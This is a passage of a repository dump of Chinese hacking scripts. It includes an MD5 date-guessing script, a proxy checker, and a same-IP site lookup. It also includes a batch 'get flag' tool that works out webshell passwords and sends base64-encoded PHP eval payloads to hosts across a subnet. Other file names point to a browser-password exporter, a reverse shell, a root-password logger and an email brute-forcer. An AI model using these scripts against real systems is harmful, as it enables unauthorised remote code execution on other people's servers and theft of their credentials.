args="".join(commands) 85 | argss="".join(keys) 86 | print args,argss 87 | if len(args) < 5: 88 | sys.exit() 89 | else: 90 | getshell(args,argss) -------------------------------------------------------------------------------- /字典加dz uc_key getshell/字典.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/字典加dz uc_key getshell/字典.rar -------------------------------------------------------------------------------- /导出浏览器密码.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/导出浏览器密码.py -------------------------------------------------------------------------------- /弱编码MD5小脚本py.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import re 3 | 4 | month = ['01','02','03','04','05','06','07','08','09','10','11','12'] 5 | 6 | def days(): 7 | days_tmp = range(10,32) 8 | L=[] 9 | for i in days_tmp: 10 | tmp = str(i) 11 | L.append(tmp) 12 | days = month+L 13 | return days 14 | def years(): 15 | year = range(2000,2018) 16 | Y=[] 17 | for i in year: 18 | tmp = str(i) 19 | Y.append(tmp) 20 | return Y 21 | if __name__ == "__main__": 22 | year = years() 23 | day = days() 24 | A=[] 25 | for i in year: 26 | for j in month: 27 | for k in day: 28 | tmp = i+j+k 29 | A.append(tmp) 30 | for i in A: 31 | src = i 32 | m2 = hashlib.md5() 33 | m2.update(src) 34 | ss = m2.hexdigest() 35 | if (re.findall(re.compile(r'c5e61e44f8d'), ss)): 36 | print ss,src -------------------------------------------------------------------------------- /扫描内网IP 对应MAC地址 网卡名字 内网渗透时候可以用到-t00ls.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/扫描内网IP 对应MAC地址 网卡名字 内网渗透时候可以用到-t00ls.rar -------------------------------------------------------------------------------- /批量get flag的python脚本.py: -------------------------------------------------------------------------------- 1 | 脚本使用对象: 2 | 一个c段攻防环境,靶机的漏洞都相同,拿到shell后,想批量get flag的人。 3 | 代码一共两个功能,一个产生shell密码的【ip地址的md5前八位】,一个是批量get flag的【借鉴了菜刀的原理】。 4 | #coding: utf-8 5 | import urllib 6 | import urllib2 7 | from hashlib import md5 8 | import base64 9 | 10 | s0='@eval(base64_decode($_POST[z0]));' 11 | s1=''' 12 | $cmdstr="curl [url]http://10.10.10.1/flag.html[/url]"; 13 | exec($cmdstr,$getkey); 14 | echo var_dump($getkey); 15 | ''' 16 | s1=base64.b64encode(s1) 17 | subip='192.168.126' #config: ip subnet 18 | ip_start=130 #config: sub ip start 19 | ip_end=140 #config: sub ip end 20 | shellpath='/c.php' #config: shell file path 21 | 22 | 23 | def get_shellpass(shellip): 24 | s='' 25 | for i in range(ip_start,ip_end): 26 | ip=shellip+'.'+str(i) 27 | password=md5(ip).hexdigest()[0:8] 28 | print 'ip: '+ip+' | '+'password: '+password 29 | 30 | 31 | def get_flag(flagip,flagpath): 32 | s='' 33 | for i in range(ip_start,ip_end): 34 | ip=flagip+'.'+str(i) 35 | password=md5(ip).hexdigest()[0:8] 36 | postdata = password+'='+s0+'&z0='+s1 37 | #print postdata 38 | url='http://'+ip+flagpath 39 | try: 40 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 41 | f = opener.open(url, postdata,timeout=0.5) 42 | #f=urllib2.urlopen(url,timeout=0.5) 43 | ftext=f.read() 44 | if f.getcode()==404: 45 | continue 46 | elif f.text=='': 47 | continue 48 | else: 49 | print '[+] '+ip+': Success!' 50 | s=s+'ip:'+ip+' '+ftext+'\r\n' 51 | continue 52 | except urllib2.URLError, e: 53 | print '[-] '+ip+': Host can not connect.' 54 | continue 55 | re_file=open('log.txt','w+') # write to file 56 | re_file.write(s) 57 | 58 | 59 | def main(): 60 | print '''\r\n-------------------{Shell Password}-----------------\r\n''' 61 | get_shellpass(subip) 62 | print '''\r\n-------------------{Get Flag}-----------------------\r\n''' 63 | get_flag(subip,shellpath) 64 | 65 | 66 | if __name__=='__main__': 67 | main() -------------------------------------------------------------------------------- /批量扫描注入点-小葵.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/批量扫描注入点-小葵.py -------------------------------------------------------------------------------- /批量验证代理ip.py: -------------------------------------------------------------------------------- 1 | 2 | # -*- coding: utf-8 -*- 3 | from bs4 import BeautifulSoup 4 | import sys,requests,lxml,re 5 | #设置 utf8 字符流处理 6 | reload(sys) 7 | sys.setdefaultencoding('utf-8') 8 | 9 | #设置头信息 10 | headers={ "User-Agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36", 11 | "Accept":"*/*", 12 | "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", 13 | "Accept-Encoding":"gzip, deflate", 14 | "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8", 15 | "X-Requested-With":"XMLHttpRequest", 16 | "Connection":"keep-alive" 17 | } 18 | 19 | #代理验证,proxies() #传入一个字典 20 | def proxies(urls = {"http":"http://124.240.187.78:81"} ): 21 | proxies = urls 22 | # timeout=60 设置超时时间60秒 23 | # res.status_code 查看返回网页状态码 24 | # verify = False 忽略证书 25 | try: 26 | res = requests.get(url = "http://1212.ip138.com/ic.asp",proxies = proxies, verify = False,timeout=60,headers = headers) 27 | #print u"访问畅通!!!" 28 | #print res.content 29 | if res.status_code == 200 : 30 | #print u"代理可用!" 31 | #print res.content 32 | ##with open("1.txt",'wb') as f: 33 | ## f.write(res.content) 34 | print urls 35 | print u"访问没有问题,返回1" 36 | return proxies 37 | else: 38 | print urls 39 | print u"访问不可用,返回0" 40 | return False 41 | except Exception, e: 42 | print urls 43 | print u"访问异常,返回0" 44 | return False 45 | 46 | #获取列表页数 并 生成列表超链接 47 | def get_list_page(listurl = "http://www.xicidaili.com/nt/"): 48 | #获取列表页数 49 | doc = requests.get(url = listurl,headers = headers).text 50 | soup = BeautifulSoup(doc,'lxml') 51 | page_html = soup.find("div",class_="pagination") 52 | page_list = re.findall(r"\d+",str(page_html)) 53 | page_max = int(page_list[-2]) 54 | #生成列表超链接 55 | list_all = [] 56 | for i in xrange(1,page_max+1): 57 | url = re.sub('/\d+','/%d'%i,listurl+"1",re.S) 58 | #print url 59 | list_all.append(url) 60 | else : 61 | #print list_all 62 | return list_all 63 | 64 | 65 | #抓取页面字段 66 | def page_data(url = "http://www.xicidaili.com/nn/1"): 67 | resule = [] 68 | html = requests.get(url,headers = headers).text 69 | soup = BeautifulSoup(html,'lxml') 70 | table = soup.select('table tr') 71 | for tr in table: 72 | #print tr 73 | td = tr.select('td') 74 | iplist = [] 75 | for ip in td: 76 | #print ip.string 77 | iplist.append(ip.string) 78 | #print iplist 79 | if iplist : 80 | resule.append(iplist[5].lower() + ':' + iplist[5].lower() + '://' + iplist[1] + ':' + iplist[2]) 81 | return resule 82 | #获取数据 83 | 84 | #追加保存数据 85 | def save_ip(ip): 86 | with open('ip.txt', 'a') as f: 87 | f.writelines(ip) 88 | f.close() 89 | 90 | 91 | #proxies() 92 | #print get_list_page("http://www.xicidaili.com/nn/") 93 | #print page_data() 94 | 95 | 96 | list_url = get_list_page(listurl = "http://www.xicidaili.com/nt/") 97 | for url in list_url: 98 | iplist = page_data(url) 99 | #print iplist 100 | #exit() 101 | for ip in iplist: 102 | arr = re.split(':',ip) 103 | #print type(arr),arr,arr[0],arr[1],arr[2],arr[3] 104 | parame = {arr[0]:arr[1]+':'+arr[2]+':'+arr[3]} 105 | res = proxies(parame) 106 | if res : 107 | #print u"file_put" #写入文件 108 | save_ip(str(arr[1]+':'+arr[2]+':'+arr[3])+"\r\n") 109 | else: 110 | #访问不可用时走这里的流程 111 | pass 112 | 113 | 114 | 115 | 116 | if __name__ == '__main__': 117 | #print "main" 118 | pass -------------------------------------------------------------------------------- /把所有的网关选出来.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/把所有的网关选出来.py -------------------------------------------------------------------------------- /源端口反弹shell.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/源端口反弹shell.py -------------------------------------------------------------------------------- /特殊命令.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/特殊命令.txt -------------------------------------------------------------------------------- /用python自动拔号并取本地网卡的IP地址外网IP地址以及下一跳由的地址.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/用python自动拔号并取本地网卡的IP地址外网IP地址以及下一跳由的地址.py -------------------------------------------------------------------------------- /百度url采集.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/百度url采集.py -------------------------------------------------------------------------------- /端口扫描/使用.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/端口扫描/使用.txt -------------------------------------------------------------------------------- /简利同IP站查询:.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import urllib 4 | import sys 5 | import re 6 | try: 7 |         url = "http://s.tool.chinaz.com/same?s= " 8 |         zhan = sys.argv[1] 9 |         f = open(zhan + ".txt","w") 10 |         jieguo = urllib.urlopen(url + str(zhan)) 11 |         content = jieguo.read() 12 |         ree = r"\<\/span\> \"                     13 |         ss = re.findall(ree,content) 14 |         for x in ss: 15 |                 print>>f,x 16 |         print 'ok,look ' + zhan + '.txt.' 17 |         f.close() 18 | except: 19 |         print 'eg:python pz.py bbs.ichunqiu.com' 20 | -------------------------------------------------------------------------------- /记录root密码.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/记录root密码.py -------------------------------------------------------------------------------- /邮箱爆破.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/邮箱爆破.py --------------------------------------------------------------------------------